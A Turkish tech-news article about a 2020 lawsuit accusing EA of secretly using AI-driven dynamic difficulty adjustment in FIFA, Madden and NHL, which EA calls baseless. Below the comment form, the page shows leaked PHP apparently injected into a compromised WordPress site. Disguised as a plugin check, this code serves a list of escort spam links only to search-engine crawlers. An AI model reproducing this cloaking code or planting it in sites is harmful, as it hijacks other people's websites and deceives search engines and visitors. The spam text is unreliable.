Sıradaki içerik:

iPhone 12 mini ve Pro Max'in Türkiye Satış Tarihi Belli Oldu

e
sv

EA, Spor Oyunlarında Zorluğu Gizlice Artırmakla Suçlandı

12 Aralık 2020 19:33
avatar

  • e 0

    Mutlu

  • e 0

    Eğlenmiş

  • e 0

    Şaşırmış

  • e 0

    Kızgın

  • e 0

    Üzgün

Oyun dünyasının en büyük şirketlerinden birisi olan Electronic Arts (EA), son zamanlarda FIFA dâhil öbür spor oyunu serileriyle beraber gündemden düşmüyor. Şirket, bundan birkaç hafta önce FIFA'daki loot kutuları nedeniyle Hollanda Kumar Kurumu tarafından değişiklik yapmaya zorlanmıştı.

Dev şirket, bugünse bambaşka ve daha geniş çaplı bir iddiayla gündeme geldi. Amerika Birleşik Devletleri'nde üç Kaliforniyalı, EA'nın kendilerini gizli bir şekilde manipüle etmekle suçladı. EA'ya dava açan Kaliforniyalılar, şirketi FIFA, Madden ve NHL oyunlarında zorluğu ayarlayan patentli yapay zeka teknolojisini gizlice kullanmakla suçladı.

EA: İddia 'temelsiz':

electronic arts

Dava dosyasına göre EA, fazla oyunculu moddaki çevrimiçi karşılaşmalarda zorluğu adil olmayan bir şekilde artıyor. Bu sayede oyuncular, zafere bir adım daha yaklaşmak için oyunda gerçek parayla harcama yapıyorlar. Bu iddia EA tarafından yalanlandı ve şirket, teknolojiyi uygulamadıklarını, iddianın 'temelsiz' olduğunu anlatım etti.

Fakat EA'nın böylesine bir teknoloji kullanarak zorluğu gizlice artırdığı iddiaları Reddit, Twitter ve YouTube gibi dev platformlarda binlerce kullanıcı tarafından tartışılıyordu. Hatta YouTube'da bu bağlantıdan ulaşabileceğiniz bir videoda oyuncu, oyun sırasında dinamik zorluk ayarlamasının 10 kanıtını diri olarak gösteriyordu.

Peki bu teknoloji neyin nesi?

electronic arts

Şirketin dinamik zorluk ayarı teknolojisiyse aslında 2016 yılında patentlenmiş, fakat ancak 2018 yılında YouTube'daki bu videoyla duyulmuştu. Patent, temel anlamda oyunun zorluğunu gizlice ayarlayan yapay zekâ destekli bir zorluk ayarını açıklıyordu. Hatta patentte açık bir şekilde “Bazı uygulamalarda zorluk ayarlaması bir kullanıcı tarafından tespit edilemez.” ibaresi yer alıyordu.

EA, böylesine bir teknolojiyi kullandığını her fırsatta reddetmiş olsa da bu patentin varlığı maalesef şirkete olan güveni de sarsıyor. 2017 yılında Star Wars: Battlefront II'de yaşanan para vermeden oynanabilir karakter açma zorluğu bile şirketin peş peşe 'Amerika'nın En Kötü Şirketi' seçilmesine sebep olmuştu. Önümüzdeki haftalarda EA hakkında daha fazla haber duyacağız gibi duruyor. Aynı zamanda yaşanan bu gelişmeler oyun dünyasının giderek farklı noktalara kaydığını da gösteriyor.

Kaynak : https://slate.com/technology/2020/12/electronic-arts-fifa-madden-nhl-lawsuit-dynamic-difficulty-adjustment.html

  • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = '
Araklı escort Eşme escort Alaşehir escort Gölpazarı escort Dalaman escort Ermenek escort İpsala escort Birecik escort Dinar escort Andırın escort Akçaabat escort Banaz escort Akhisar escort Bozüyük escort Bodrum escort Ayrancı escort Havza escort Akçakale escort Bolvadin escort Afşin escort Şanlıurfa escort Serik escort Soma escort Tavşanlı escort Taşova escort Siirt escort Şile escort Süleymanpaşa escort Turhal escort Tatvan escort Silivri escort Mersin escort Sincan escort Muğla escort Gebze escort Denizli escort
'; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');